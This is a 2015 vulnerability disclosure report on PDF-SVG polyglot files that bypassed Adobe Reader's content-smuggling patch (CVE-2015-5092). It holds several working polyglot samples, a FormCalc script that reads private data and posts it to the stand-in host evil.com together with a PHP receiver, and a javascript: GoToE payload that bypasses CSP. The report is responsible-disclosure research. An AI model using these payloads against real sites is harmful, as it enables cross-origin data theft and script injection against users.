12
PDF-based polyglots through SVG images Target product: Adobe Reader Researcher: Mauro Gentile

PDF-based polyglots through SVG images

Embed Size (px)

Citation preview

Page 1: PDF-based polyglots through SVG images

PDF-based polyglots

through SVG images

Target product: Adobe Reader

Researcher: Mauro Gentile

Page 2: PDF-based polyglots through SVG images

PDF-SVG polyglots in Adobe Reader

Page 1/11

Summary

1 PDF-BASED POLYGLOTS THROUGH SVG IMAGES ............................... 2

1.1.1 Description ............................................................................................................. 2

1.1.2 Exploitation scenario ............................................................................................. 4

1.1.3 Impact .................................................................................................................... 7

1.1.4 Polyglots related to XSS and Content Security Policy ............................................ 8

1.1.5 References ........................................................................................................... 10

Page 3: PDF-based polyglots through SVG images

PDF-SVG polyglots in Adobe Reader

Page 2/11

1 PDF-based polyglots through SVG images

The vulnerability described in this report was responsibly reported to Adobe on April 21, 2015.

Adobe released a patch on July 14, 2015 (APSB15-15: https://helpx.adobe.com/security/products/reader/apsb15-15.html), and has assigned CVE-2015-5092 to the specific security issue.

1.1.1 Description

The “PDF Content Smuggling” concept was introduced by Magazinius, Rios and Sabelfeld in an academic paper entitled “Polyglots: Crossing Origins by Crossing Formats” [1, 2]; the technique is based on the idea to adopt PDF-based polyglots (i.e. files which are both PDF documents and images) to perform same-origin request forgery aiming towards exfiltrating private data in the context of a target domain [3, 4].

Adobe patched this issue by comparing the first bytes of the PDF document against a set of known file signatures: if a match is found, the parser will abort loading of the document. Obviously, such approach has some intrinsic weaknesses:

1. Blacklisting known file signatures could be bypassed if we are able to spot file formats, which are not blacklisted.

2. Identifying file formats, whose signature can appear beyond offset 0, would still lead to PDF-based polyglots.

However, no widespread image format is allowed to start beyond offset 0 [5, 6] and signatures for popular formats are blacklisted. This implies that PDF-based polyglots are not possible anymore if the benign format is a common image, unless there exists a format with some degree of freedom with respect to the “signature bytes”.

As a consequence of these considerations, we can introduce the PDF-SVG polyglots, since SVG format is quite tolerant with respect to the “signature bytes”1.

Adobe took into consideration SVG images too, and made the following choices2 when addressing the content smuggling issue:

“<?xml” at offset 0 is blacklisted

“<svg” at offset 0 is blacklisted

“<!DOCTYPE” at offset 0 is not blacklisted

1 For the sake of clarity, it is not appropriate to talk about “signature bytes” for the SVG format. 2 Test results refer to Adobe Reader version 11.0.11; changes have been applied in version 11.0.12 in order to address the vulnerability herein described.

Page 4: PDF-based polyglots through SVG images

PDF-SVG polyglots in Adobe Reader

Page 3/11

Introducing whitespaces and/or new lines before “<?xml” or “<svg” does not bypass the patch; instead, putting any other character before these two blacklisted signatures leads to a successful bypass, but it makes the resulting SVG file not syntactically well-formed.

Nevertheless, valid PDF-SVG polyglots, which will be correctly read both by Adobe Reader and by SVG images interpreters, can exist as we are reporting in the following cases.

1) Comment at offset 0

<!---->

<svg xmlns="http://www.w3.org/2000/svg" version="1.1">

<circle r="100" fill="blue" />

</svg>

<!--%PDF-1.

1 0 obj<</Kids[<</Parent 1 0 R/Contents[2 0 R]>>]/Resources<<>>>>2 0 obj<<>>stream

BT/default 40 Tf 1 0 0 1 1 715 Tm(hello world)Tj ET

endstream

endobj

trailer<</Root<</Pages 1 0 R>>>>-->

2) Dummy tag at offset 0

<i>

<svg xmlns="http://www.w3.org/2000/svg" version="1.1">

<circle r="100" fill="blue" />

</svg>

</i> <!--%PDF-1.

1 0 obj<</Kids[<</Parent 1 0 R/Contents[2 0 R]>>]/Resources<<>>>>2 0 obj<<>>stream

BT/default 40 Tf 1 0 0 1 1 715 Tm(hello world)Tj ET

endstream

endobj

trailer<</Root<</Pages 1 0 R>>>>-->

3) Tag "<?dummy" at offset 0

<?h ?>

<svg xmlns="http://www.w3.org/2000/svg" version="1.1">

<circle r="100" fill="blue" />

</svg>

<!--%PDF-1.

1 0 obj<</Kids[<</Parent 1 0 R/Contents[2 0 R]>>]/Resources<<>>>>2 0 obj<<>>stream

Page 5: PDF-based polyglots through SVG images

PDF-SVG polyglots in Adobe Reader

Page 4/11

BT/default 40 Tf 1 0 0 1 1 715 Tm(hello world)Tj ET

endstream

endobj

trailer<</Root<</Pages 1 0 R>>>>-->

4) <!DOCTYPE at offset 0

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"

"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg xmlns="http://www.w3.org/2000/svg" version="1.1">

<circle r="100" fill="blue" />

</svg>

<!--%PDF-1.

1 0 obj<</Kids[<</Parent 1 0 R/Contents[2 0 R]>>]/Resources<<>>>>2 0 obj<<>>stream

BT/default 40 Tf 1 0 0 1 1 715 Tm(hello world)Tj ET

endstream

endobj

trailer<</Root<</Pages 1 0 R>>>>-->

5) SVG in PDF comment

<!--%PDF-1.

1 0 obj<</Kids[<</Parent 1 0 R/Contents[2 0 R]>>]/Resources<<>>>>2 0 obj<<>>stream

BT/default 40 Tf 1 0 0 1 1 715 Tm(hello world)Tj ET

%--><svg xmlns="http://www.w3.org/2000/svg" version="1.1"><circle r="100" fill="blue"

/></svg><!--

endstream

endobj

trailer<</Root<</Pages 1 0 R>>>>-->

1.1.2 Exploitation scenario

Let us assume that the web application ideally hosted on example.com allows users to upload SVG images; once the attacker manages to upload a malicious PDF-SVG polyglot on example.com and asks the victim to visit http://evil.com/test.html, he could steal its private information as well as anti-CSRF tokens.

Data can be accessed by asking PDF files to trigger same-origin HTTP requests [7, 8, 9] through FormCalc APIs.

For the sake of precision, note that if the target web application is allowing PDF files uploads, then such technique would become useless; uploading a genuine PDF file,

Page 6: PDF-based polyglots through SVG images

PDF-SVG polyglots in Adobe Reader

Page 5/11

instead of a polyglot, would lead to the same result, unless some filtering procedures are in place for such file format.

http://example.com/files/user_uploaded.svg

<!DOCTYPE svg>

<svg xmlns="http://www.w3.org/2000/svg" version="1.1">

<circle r="100" fill="blue" />

</svg>

<!--

%PDF-1.

1 0 obj <<>>

stream

<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">

<config><present><pdf><interactive>1</interactive></pdf></present></config>

<template>

<subform name="_">

<pageSet/>

<field id="Hello World!">

<event activity="initialize">

<script contentType='application/x-formcalc'>

var content = Get("http://example.com/privatedata.php");

Post("http://evil.com/receiver.php",content);

</script>

</event>

</field>

</subform>

</template>

</xdp:xdp>

endstream

endobj

trailer <<

/Root <<

/AcroForm <<

/Fields [<<

/T (0)

/Kids [<<

/Subtype /Widget

/Rect []

/T ()

/FT /Btn

>>]

>>]

Page 7: PDF-based polyglots through SVG images

PDF-SVG polyglots in Adobe Reader

Page 6/11

/XFA 1 0 R

>>

/Pages <<>>

>>

>>

-->

http://example.com/privatedata.php

<?php

session_start();

if (isset($_SESSION['user'])) {

echo "PRIVATEDATA...";

} else {

echo "nothing";

}

?>

http://evil.com/test.html

<img src="http://example.com/files/user_uploaded.svg" />

<object data="http://example.com/files/user_uploaded.svg"

type="application/pdf"

width="350"

height="200" />

http://evil.com/crossdomain.xml

<?xml version="1.0" encoding="UTF-8"?>

<cross-domain-policy>

<allow-access-from domain="*"/>

</cross-domain-policy>

http://evil.com/receiver.php

<?php

if ($_SERVER['REQUEST_METHOD'] === 'POST') {

$data = file_get_contents('php://input')."\n";

$ret = file_put_contents('/tmp/data.txt', $data, FILE_APPEND | LOCK_EX);

}

Page 8: PDF-based polyglots through SVG images

PDF-SVG polyglots in Adobe Reader

Page 7/11

?>

Attack flow

The attack flow is reported below.

1. The victim logs in http://example.com/

2. The victim is asked to visit http://evil.com/test.html

3. The PDF polyglot steals victim’s private data and sends them to http://evil.com/receiver.php

Testing environment

The shown polyglots were successfully tested in the following environments:

1. Windows 7, Adobe Reader plug-in 11.0.11.18, on Mozilla Firefox 39.0, in which we set “Preview in Firefox with Adobe Reader” for the PDF file format.

2. Windows 7, Adobe Reader plug-in 11.0.11.18, on Opera 30.0, in which we disabled the “Chrome PDF viewer”.

3. Windows 7, Adobe Reader plug-in 11.0.11.18, on Google Chrome 44.0.2403.107, in which we disabled the “Chrome PDF viewer”, and enabled the Adobe Reader plug-in.

Note that PDF polyglots do not work in Internet Explorer since it downloads them and opens a local copy.

In addition, take into consideration that default installations of Firefox, Chrome and Opera do not use Adobe Reader for rendering PDF files, therefore potentially affected users are the ones who modified their browser settings in order to use Adobe Reader instead of the default built-in reader.

1.1.3 Impact

Allowing users to upload SVG files can be considered as dangerous as making them upload HTML files aiming towards triggering XSS attacks; for all details refer to the research carried out by Heiderich [10, 11, 12].

By the way, modern web applications use to adopt filters against uploaded SVG files, in order to identify whether they contain tags and/or attributes, whose goal is to execute JavaScript.

By considering the case of XSS(-SVG) filters, which are strict enough to block any bypass attempt, then the aforementioned polyglots would still make the target web application vulnerable to same-origin request forgery and content hijacking; this is due to the fact

Page 9: PDF-based polyglots through SVG images

PDF-SVG polyglots in Adobe Reader

Page 8/11

that the PDF content would be seen as a comment in the context of the SVG filtering procedure3.

For further inspiration about polyglots and PDF related resources refer to [13, 14, 15, 16, 17, 18, 19].

1.1.4 Polyglots related to XSS and Content Security Policy

Although several research has been carried out in the last years, Inführ recently proposed an interesting case for triggering Cross-Site Scripting through PDF files [7, 20].

Basically, it was possible to execute JavaScript code in the context of a target domain by uploading malicious PDF files; the execution took place by abusing the GoToE function.

By combining the PDF-based polyglots issue with the just mentioned XSS problem, we are able to craft a malicious SVG(-PDF) image which contains an HTML document, which embeds itself, making the execution of arbitrary JavaScript code take place.

Consider the following PDF-based polyglot to better understand:

<!DOCTYPE svg>

<svg xmlns="http://www.w3.org/2000/svg" version="1.1">

<circle r="100" fill="blue" />

<foreignObject>

<body xmlns="http://www.w3.org/1999/xhtml">

<embed src="#" type="application/pdf"></embed>

</body>

</foreignObject>

</svg>

<!--

%PDF-1.1

1 0 obj

<<

/Pages 2 0 R

/OpenAction 4 0 R

>>

endobj

2 0 obj

<<

/Type /Pages

3 Note that filters, discarding comments and CDATA sections, remove the PDF content from the resulting SVG image; in that case, it is obvious that PDF-SVG polyglots could not exist.

Page 10: PDF-based polyglots through SVG images

PDF-SVG polyglots in Adobe Reader

Page 9/11

/Kids [3 0 R]

>>

endobj

3 0 obj

<<

/Type /Page

/Parent 2 0 R

>>

endobj

4 0 obj

<<

/Type /Action

/S /GoToE /F (javascript:alert(document.domain))

>>

endobj

trailer

<<

/Root 1 0 R

>>

-->

The reported polyglot proves quite interesting, since it leads to a Content Security Policy bypass in Blink-based browsers4.

By considering the case of a target web application using CSP as follows, then the assumption that JavaScript execution cannot take place becomes wrong, unless the victim is using a patched version5 of Adobe Reader.

Content-Security-Policy: default-src 'self'; script-src 'none';

By visiting the SVG file reported above, document.domain is alerted.

In these conditions, the combination of the polyglots and the XSS bug becomes quite useful for attacking web applications allowing SVG files uploads (, but prohibiting genuine PDFs uploads, ) and relying only on CSP for protecting against XSS.

Although this approach raises the overall vulnerability impact, it is clear that allowing foreignObjects tags in uploaded SVG files is sufficient for being vulnerable to stored XSS;

4 Tested in Google Chrome 44.0.2403.107 and Opera 30.0, with Adobe Reader plug-in 11.0.11.18 enabled in place of Chrome PDF viewer. 5 Both XSS through GoToE and the SVG related content smuggling issue have been patched in Adobe Reader 11.0.12.

Page 11: PDF-based polyglots through SVG images

PDF-SVG polyglots in Adobe Reader

Page 10/11

therefore, the presented attack becomes reasonable if XSS protection is achieved through CSP only.

For the sake of completeness, the relation among SVG images and CSP was exhaustively described by deGraaf [21].

The adoption of polyglots to bypass CSP was previously discussed by Heiderich in a scenario in which HTML Imports were abused to load a malicious same-origin GIF image [22, 23]. Defining default-src to ‘self’ implies giving wide confidence to the same-origin, thus, having a chance to upload polyglots on this origin would make CSP protection potentially useless, unless the application is restricting any specific policy directive.

In a more general perspective, it is clear that the problem involves external trusted domains too; for instance, embedding scripts from a domain accepting SWF files uploads would still make the CSP protection useless [24].

Eventually, curious readers may be interested in some other CSP bypass techniques by Kouzemtchenko [25].

Notes:

1. The minimal PDF file was taken from: https://code.google.com/p/corkami/wiki/PDFTricks#Minimalists_PDF

2. The PDF template file, using FormCalc, was taken from the Cross-Site Content Hijacking proof of concepts by Soroush Dalili of NCC Group: https://github.com/nccgroup/CrossSiteContentHijacking/blob/master/ContentHijacking/objects/xfa-manual-ContentHijacking.pdf

1.1.5 References

[1] "Polyglots: Crossing Origins by Crossing Formats", Jonas Magazinius, Billy K. Rios, Andrei Sabelfeld - http://www.cse.chalmers.se/~andrei/ccs13.pdf

[2] "Content Smuggling", Billy K. Rios - http://xs-sniper.com/blog/2012/10/11/content-smuggling/

[3] "Crossing Origins by Crossing Formats", Jonas Magazinius - http://www.slideshare.net/internot/crossing-origins-by-crossing-formats

[4] "Crossing Origins by Crossing Formats", Jonas Magazinius - https://www.owasp.org/images/8/85/Crossing.Origins.by.Crossing.Formats-Jonas.Magazinius-OWASP-131010.pptx

[5] "Corkamix", Ange Albertini - https://code.google.com/p/corkami/wiki/mix?show=content

[6] "Messing with binary formats", Ange Albertini - http://www.slideshare.net/ange4771/messing-with-binary-formats

Page 12: PDF-based polyglots through SVG images

PDF-SVG polyglots in Adobe Reader

Page 11/11

[7] "Multiple PDF Vulnerabilities - Text and Pictures on Steroids", Alex Inführ - http://insert-script.blogspot.co.at/2014/12/multiple-pdf-vulnerabilites-text-and.html

[8] "Cross-Site Content Hijacking (XSCH) PoC", Soroush Dalili - https://github.com/nccgroup/CrossSiteContentHijacking

[9] "SDRF vulns in webapps and browsers", Vladimir Vorontsov - http://seclists.org/fulldisclosure/2010/Aug/236

[10] "HTML5 Security Cheatsheet - Vectors embedded in SVG files", Mario Heiderich - http://html5sec.org/#svg

[11] "The Image that called me", Mario Heiderich - http://www.slideshare.net/x00mario/the-image-that-called-me

[12] "Crouching Tiger - Hidden Payload: Security Risks of Scalable Vectors Graphics", Mario Heiderich, Tilman Frosch, Meiko Jensen, Thorsten Holz - http://www.hgi.ruhr-uni-bochum.de/media/hgi/veroeffentlichungen/2011/10/19/svgSecurity-ccs11.pdf

[13] "Hello, squirrel fans!", Michal Zalewski - http://lcamtuf.coredump.cx/squirrel/

[14] "Deadly Pixels", Saumil Shah - http://www.slideshare.net/saumilshah/deadly-pixels-nsc-2013

[15] "Valid pictures with useable JavaScript", Ange Albertini - https://code.google.com/p/corkami/downloads/detail?name=jspics.zip&can=2&q=

[16] "OMG-WTF-PDF", Julia Wolf - http://www.troopers.de/wp-content/uploads/2011/04/TR11_Wolf_OMG_PDF.pdf

[17] "Advanced PDF Tricks", Ange Albertini - https://speakerdeck.com/ange/advanced-pdf-tricks

[18] "Funky File Formats", Ange Albertini - https://speakerdeck.com/ange/funky-file-formats-31c3

[19] "Polyglot payloads in practice", Mathias Karlsson - http://www.slideshare.net/MathiasKarlsson2/polyglot-payloads-in-practice-by-avlidienbrunn-at-hackpra

[20] "PDF - Mess with the web", Alex Inführ - http://insert-script.blogspot.co.at/2015/05/pdf-mess-with-web.html

[21] "SVG: Exploiting Browsers Without Image Parsing Bugs", Rennie deGraaf - https://www.blackhat.com/docs/us-14/materials/us-14-DeGraaf-SVG-Exploiting-Browsers-Without-Image-Parsing-Bugs.pdf

[22] "CSP Bypass in Chrome Canary + AngularJS", Mario Heiderich - https://html5sec.org/cspbypass/

[23] "JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks", Mario Heiderich - http://www.slideshare.net/x00mario/jsmvcomfg-to-sternly-look-at-javascript-mvc-and-templating-frameworks

[24] "Building an XSS polyglot through SWF and CSP", Frans Rosén - http://labs.detectify.com/post/120088174539/building-an-xss-polyglot-through-swf-and-csp

[25] "Bypassing Content Security Policy", Alex Kouzemtchenko - https://www.youtube.com/watch?v=LA9S9I4Co00